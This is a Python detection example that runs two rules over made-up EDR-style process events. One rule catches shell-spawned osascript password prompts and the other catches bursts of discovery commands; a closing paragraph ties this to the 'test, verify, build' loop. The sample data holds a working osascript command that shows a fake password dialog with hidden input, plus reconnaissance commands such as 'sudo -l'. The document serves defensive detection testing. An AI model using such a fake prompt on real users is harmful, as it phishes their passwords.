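"""Added example, not from the talk and not Atomic Red Team code: two
detection rules run over constructed EDR-style process events.
All hosts, timestamps, parents and command lines below are made up."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry: (timestamp, host, parent_process, process, command_line)
EVENTS = [
    # mac-01: an updater (assumed parent name) prompting for a password: benign
    ("2018-06-23T08:55:00", "mac-01", "VendorUpdater", "osascript",
     'osascript -e \'display dialog "VendorUpdater needs your password" default answer "" with hidden answer\''),
    # mac-01: the same dialog spawned from bash: suspicious
    ("2018-06-23T09:01:10", "mac-01", "bash", "osascript",
     'osascript -e \'display dialog "Enter your password" default answer "" with hidden answer\''),
    # mac-01: osascript from a shell with no password prompt: not this rule
    ("2018-06-23T09:05:00", "mac-01", "bash", "osascript",
     'osascript -e \'tell application "Finder" to activate\''),
    # lnx-02: a burst of discovery commands in under a minute: cluster
    ("2018-06-23T10:00:00", "lnx-02", "bash", "whoami", "whoami"),
    ("2018-06-23T10:00:05", "lnx-02", "bash", "id", "id"),
    ("2018-06-23T10:00:12", "lnx-02", "bash", "uname", "uname -a"),
    ("2018-06-23T10:00:30", "lnx-02", "bash", "ifconfig", "ifconfig -a"),
    ("2018-06-23T10:00:45", "lnx-02", "bash", "netstat", "netstat -an"),
    ("2018-06-23T10:00:50", "lnx-02", "bash", "sudo", "sudo -l"),
    # lnx-03: an admin running two discovery commands hours apart: no cluster
    ("2018-06-23T08:00:00", "lnx-03", "bash", "whoami", "whoami"),
    ("2018-06-23T14:00:00", "lnx-03", "bash", "id", "id"),
]

SHELLS = {"bash", "sh", "zsh", "dash", "python", "perl"}
DISCOVERY = {"whoami", "id", "uname", "ifconfig", "netstat", "sudo", "last",
             "groups", "dscl", "hostname", "arp"}


def _parse(ev):
    ts, host, parent, proc, cmd = ev
    return datetime.fromisoformat(ts), host, parent, proc, cmd


def shell_spawned_password_prompts(events):
    """Rule 1: osascript asking for a password, spawned by a shell.
    Returns a list of (host, timestamp, command_line)."""
    hits = []
    for ts, host, parent, proc, cmd in map(_parse, events):
        if proc == "osascript" and parent in SHELLS and "password" in cmd.lower():
            hits.append((host, ts.isoformat(), cmd))
    return hits


def discovery_clusters(events, window=timedelta(minutes=5), threshold=4):
    """Rule 2: at least `threshold` distinct discovery commands on one host
    inside `window`.  Returns {host: sorted list of commands seen}."""
    by_host = defaultdict(list)
    for ts, host, parent, proc, cmd in map(_parse, events):
        if proc in DISCOVERY:
            by_host[host].append((ts, proc))
    hits = {}
    for host, evs in by_host.items():
        evs.sort()  # time-ordered, so each window is a forward slice
        for i, (start, _) in enumerate(evs):
            seen = {proc for ts, proc in evs[i:] if ts - start <= window}
            if len(seen) >= threshold:
                hits[host] = sorted(seen)
                break
    return hits


def run_detections(events):
    """Run both rules and return a list of (rule, host, detail) findings."""
    findings = [("shell_spawned_password_prompt", host, cmd)
                for host, _, cmd in shell_spawned_password_prompts(events)]
    findings += [("discovery_cluster", host, ", ".join(cmds))
                 for host, cmds in discovery_clusters(events).items()]
    return findings


if __name__ == "__main__":
    for rule, host, detail in run_detections(EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

Run as a script it reports one finding per rule: the bash-spawned password dialog on mac-01 and the six-command discovery burst on lnx-02, while the updater's identical dialog and the admin's two commands hours apart stay quiet. Swapping the constructed EVENTS for real process telemetry is the "test, verify, build" loop the talk describes: execute the atomic, then check that the rule actually fires, including for the shell-invoked variant the first slide's detection would have missed.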